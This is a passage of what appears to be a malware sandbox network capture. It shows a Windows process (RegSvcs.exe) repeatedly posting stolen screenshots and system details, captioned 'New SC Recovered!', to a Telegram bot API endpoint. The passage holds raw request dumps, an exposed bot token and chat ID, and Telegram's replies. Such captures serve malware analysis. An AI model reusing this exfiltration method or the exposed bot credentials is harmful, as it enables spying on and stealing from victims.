06-27-52.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrGdSg3UOFByhuHW4NO_aVKZpNEPXAAL5FAACOh6ZUl3ZKvwpHZsiAQAHbQADNgQ","file_unique_id":"AQAD-RQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrGdSg3UOFByhuHW4NO_aVKZpNEPXAAL5FAACOh6ZUl3ZKvwpHZsiAQAHbQADNgQ","file_unique_id":"AQAD-RQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaxnUoN1DhQcobh1uDTv2lSmaTRD1wAC-RQAAjoemVJd2Sr8KR2bIjYE","file_unique_id":"AgAD-RQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/16/2025 06:17:45\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50029	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:19 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6834711be7f9 Host: api.telegram.org Content-Length: 66944 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:19 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 35 20 30 34 3a 35 34 3a 32 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd6834711be7f9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6834711be7f9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/21/2025 04:54:20User
2024-12-06 04:54:19 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:19 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:54:19 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:19 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:54:19 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:54:19 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 33 34 37 31 31 62 65 37 66 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd6834711be7f9--
2024-12-06 04:54:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:20 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:20 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170413,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460860,"document":{"file_name":"user-610930 2025-03-21 04-54-20.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrWdSg3zRwnxbx7s4wt5aGIxsNZbgAAL6FAACOh6ZUmT7DsHX6rGyAQAHbQADNgQ","file_unique_id":"AQAD-hQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrWdSg3zRwnxbx7s4wt5aGIxsNZbgAAL6FAACOh6ZUmT7DsHX6rGyAQAHbQADNgQ","file_unique_id":"AQAD-hQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECma1nUoN80cJ8W8e7OMLeWhiMbDWW4AAC-hQAAjoemVJk-w7B1-qxsjYE","file_unique_id":"AgAD-hQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/21/2025 04:54:20\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50030	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:24 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6b8cf29bbe5c Host: api.telegram.org Content-Length: 66944 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:24 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 35 2f 32 30 32 35 20 31 30 3a 34 35 3a 32 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd6b8cf29bbe5cContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6b8cf29bbe5cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/25/2025 10:45:26User
2024-12-06 04:54:24 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:24 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:54:24 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:54:24 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:54:24 UTC	1358	OUT	Data Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4 Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?ImyM c`:h(%mX:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
2024-12-06 04:54:24 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 62 38 63 66 32 39 62 62 65 35 63 2d 2d 0d 0a Data Ascii: -----------------------------8dd6b8cf29bbe5c--
2024-12-06 04:54:24 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:54:25 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:54:25 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170414,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460865,"document":{"file_name":"user-610930 2025-03-25 11-05-26.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZrmdSg4FlqTkFXo3slAL2WZQh6WY2AAL7FAACOh6ZUsML3VQ1iq97AQAHbQADNgQ","file_unique_id":"AQAD-xQAAjoemVJy","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZrmdSg4FlqTkFXo3slAL2WZQh6WY2AAL7FAACOh6ZUsML3VQ1iq97AQAHbQADNgQ","file_unique_id":"AQAD-xQAAjoemVJy","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECma5nUoOBZak5BV6N7JQC9lmUIelmNgAC-xQAAjoemVLDC91UNYqvezYE","file_unique_id":"AgAD-xQAAjoemVI","file_size":66323},"caption":"New SC Recovered!\n\nTime: 03/25/2025 10:45:26\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50031	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:54:31 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6fcfbb3027c3 Host: api.telegram.org Content-Length: 66944 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:54:31 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 63 66 62 62 33 30 32 37 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 33 30 2f 32 30 32 35 20 32 31 3a 30 33 3a 32 37 0a 55 73 65 72 Data Ascii: -----------------------------8dd6fcfbb3027c3Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6fcfbb3027c3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/30/2025 21:03:27User
2024-12-06 04:54:31 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:54:31 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
